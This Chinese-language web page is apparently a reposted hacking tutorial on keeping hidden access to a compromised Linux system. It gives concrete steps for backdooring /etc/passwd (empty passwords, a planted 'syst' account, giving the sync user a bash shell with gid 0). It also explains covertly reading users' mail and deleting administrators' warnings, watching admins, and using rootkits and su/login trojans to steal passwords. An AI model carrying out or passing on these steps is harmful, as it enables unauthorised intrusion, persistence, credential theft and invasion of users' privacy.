我要评论
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
以上这些已足够我们使用了,因此我只列出这些用户。
1. 查看用户operator、ftp和postmaster,所有这些帐号都可以执行shell,而且没有设
置密码。在你的shell中输入:
passwd postmaster
回车(entern)以设置其密码为空。这样,你就能在任何时候用这个帐号登录,
同时也不会引起引起系统管理员的怀疑。
2. 在passwd档中加入下面一行:
syst::13:12:system:/var/spool:/bin/bash
将该行放入文件内部(不会引起注意)。在密码部分::可以不进行设置,或者在
root shell中键入passwd syst以输入新密码。组和用户id可以随意设置。
3. 查看sync用户一行:
sync:*:5:0:sync:/sbin:/bin/sync
将其修改为:
sync:*:5:0:sync:/sbin:/bin/bash
然后运行
将密码设置为空(或其他)。在这个账号中gid=0。;-)
安装游戏
----------------
如果系统中装中游戏,你也可以安装一些可以利用的游戏,如doom、abuse。在附录
中有可以利用这些游戏取得root权限的程序。
保持监视
------------------
总是要知道系统中的管理员是谁。如何如何发现他们呢?可以查看passwd档中的
用户根目录、用户id、用户组或者阅读bash_history文件查看使用管理员命令的用户。
你还可以从这些历史文件中学到新的命令,不过,主要还是要知道谁在这个系统里。
一定要很熟悉你正在使用的系统;用su : 查找用户;浏览log文件以查看谁在使用管理
员命令。
对系统保持监视。当你在系统中时,要注意别人。查看管理员命令历史记录,看看
他们在使用什么命令:tty端口监听?过多的ps命令?在ps或w或who命令后跟着finger
命令说明他们正在监视系统中其他用户。监视系统管理员,并要留意他们对系统中用户
有多少了解。
阅读系统邮件
首先要记住:从不使用系统邮件程序。否则用户会知道你阅读了他们的邮件。我使用
了一些方法来阅读邮件。现在让我们来看一看:
1. cd /var/spool/mail
在此目录中保存着所有未阅读邮件和等待中的邮件。我们可以按照以下步骤阅读
邮件:
grep -i security * |more
grep -i hack * |more
grep -i intruder * |more
grep -i passwd * |more
grep -i password * |more
譬如你想查看pico用户名,可以键入ctrl w来进行搜索。如果你看见有其他系统
管理员有邮件告诉系统管理员你正在使用某用户名从他们的服务器上攻击该系统,
你当然可以删除它了。
有一个邮件阅读器,它允许你阅读邮件,但并不更新邮件标识(是否已读):
http://obsidian.cse.fau.edu/~fc
在那里有一个工具可以在不改变最后阅读日期的情况下显示/var/spool/mail中的邮件。
也就是说,他们(用户)根本不知道你已阅读过他们的邮件。
另外要记住,你可以在用户的目录下发现其他系统邮件。一定要检查/root目录。
检查/root/mail或username/mail或其它包含了以前邮件的目录。
祝你“狩猎”快乐。。。
--------------------------------------------------------------------------------
root和demon工具及特洛伊木马
root工具是ps、login、netstat的c源程序,有时还有一些已经被“黑”过的程序以
供你使用。有了这些工具,就可以更换目标主机上的login文件,从而使你能够不用帐号
就可以在目标主机上登录。
你还可以修改ps,使你在系统管理员使用ps命令时不会暴露,还可以隐藏一些有
明显含义的可执行文件(如“sniff”开始的文件)在运行时的进程。
demon工具提供了identd、login、demon、ping、su、telnet和socket的黑客程序。
特洛伊木马是那些可以让你在某些方面欺骗系统的程序。一个放在系统管理员目
录下的su木马程序,只要你改变了他的查找路径,su木马程序就能在真正的su程序前首
先运行。在向其提示输入错误密码,同时删除木马程序并保存其密码到/tmp目录下。
一个login木马程序可以将主机上所有的登录密码保存在一个文件中。我想你知道
其中的含义了吧。;-)
demon和linux root工具的源程序可在附录vi中找到。
- 站内搜索
发表评论